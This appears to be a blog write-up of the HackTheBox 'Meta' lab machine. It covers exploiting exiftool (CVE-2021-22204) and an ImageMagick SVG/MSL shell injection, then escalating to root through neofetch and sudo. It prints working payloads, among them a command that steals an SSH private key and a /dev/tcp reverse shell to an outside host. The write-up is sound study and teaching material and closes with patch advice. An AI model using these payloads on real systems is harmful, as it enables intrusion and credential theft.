d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-meta-htb/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

154 lines
5.1 KiB
Markdown
Raw Permalink Blame History

---
title: "Writeup - Meta (HTB)"
date: 2022-04-03
slug: "writeup-meta-htb"
type: "writeup-ctf"
---
This is a writeup for the [Meta](https://app.hackthebox.com/machines/Meta) machine from the HackTheBox site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV -T4 -Pn 10.129.119.94
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 7.9p1)
- 80/tcp : HTTP web server (Apache httpd)
![](img/image-2.webp)
## Exploit
At first I order by listing the different pages of the site.
![](img/image-3.webp)
Nothing in particular, I continue by making an enumeration of the subdomains.
![](img/image-4.webp)
Ok, there is a subdomain, I add it to the `/etc/hosts` file, then I access it via a browser.
![](img/image-5.webp)
It is a page that redirects us to another page that contains a form to upload a file.
![](img/image-6.webp)
So I try to upload an image to see what the page tells me:
![](img/image-7.webp)
The result reminds me strongly of a crypto tool I already used: `exiftool`.
![](img/image-8.webp)
So I know that on the server side, this tool is used, it's a good information ! So I look if there are exploits with this service. Quickly I find this flaw : CVE-2021-22204. It is an exploit that allows via meta data in an image the execution of instructions. So we can create a reverse shell ! With a little more research I find this [github](https://github.com/convisolabs/CVE-2021-22204-exiftool).
It is a tool for image modification and reverse shell insertion.
```bash
┌──(d3vyce㉿kali)-[~]
└─$ python3 exploit.py
1 image files updated
```
Once the image is modified, I upload it and it creates the reverse shell:
![](img/image-9.webp)
I look for the location of the flag with the following command:
```bash
find / -name user.txt 2>/dev/null
```
I find that the flag is in `thomas` personal file, but I don't have the rights to read it...
So I am looking for a way to change the user. In the site folder, I find a folder `convert_image`... It is said to be an input folder for a script or a service that would convert images. I am looking for other elements with the same name on the system:
```bash
www-data@meta:/var/www/dev01.artcorp.htb/convert_images$ find / -name convert_image* 2>/dev/null
<ert_images$ find / -name convert_image* 2>/dev/null
/usr/local/bin/convert_images.sh
/var/www/dev01.artcorp.htb/convert_images
```
There is a script with the same name! Looking at the content, I can see that it uses the `[mogrify](https://linux.die.net/man/1/mogrify)` service to perform the conversion of the images in the folder.
```bash
#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify
```
I look for the version of the service with the following command:
![](img/image-10.webp)
Then I look if there are some feats. After some research I find this [exploit](https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html). It allows to do a shell injection in an SVG image.
So I use the template provided in the article, then I modify it to get the content of the `id_rsa` file of the user `thomas`.
```bash
<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa)> /dev/shm/id`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>
```
Then I copy the file to the `convert_images` folder. After a few seconds I find the newly created file in the `/dev/shm`.
Now that I have this file, I add the privileges and create an SSH session:
![](img/image-11.webp)
I now have a shell as `thomas` and I get the first flag.
## Privilege escalation
I start by checking the sudo permissions of my user. I notice 2 things:
- I have the right to use the command `/usr/bin/neofetch \"\"` as root
- The environment variable `XDG_CONFIG_HOME` is kept when running sudo
![](img/image-12.webp)
After some research, I find that `neofetch` has a file in configuration in the folder `~/.config/neofetch/`. So I start by putting a reverse shell in this config file.
```bash
thomas@meta:~/.config/neofetch$ cd .config/neofetch/
thomas@meta:~/.config/neofetch$ echo "/bin/sh -i >& /dev/tcp/10.10.14.40/2345 0>&1" > config.conf
```
Then I set the variable `XDG_CONFIG_HOME` with the `.local` of my user. Then I run `neofetch` as sudo.
```bash
thomas@meta:~/.config/neofetch$ export XDG_CONFIG_HOME="$HOME/.config"
thomas@meta:~/.config/neofetch$ sudo -u root /usr/bin/neofetch \"\"
```
I now have a reverse shell `root` and I can get the last flag.
![](img/image-13.webp)
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Update `exiftool` to avoid CVE-2021-22204
- Update `mogrify` to avoid shell injection exploit
- Disable the option to keep the`XDG_CONFIG_HOME` variable at runtime with sudo
Reference in New Issue View Git Blame Copy Permalink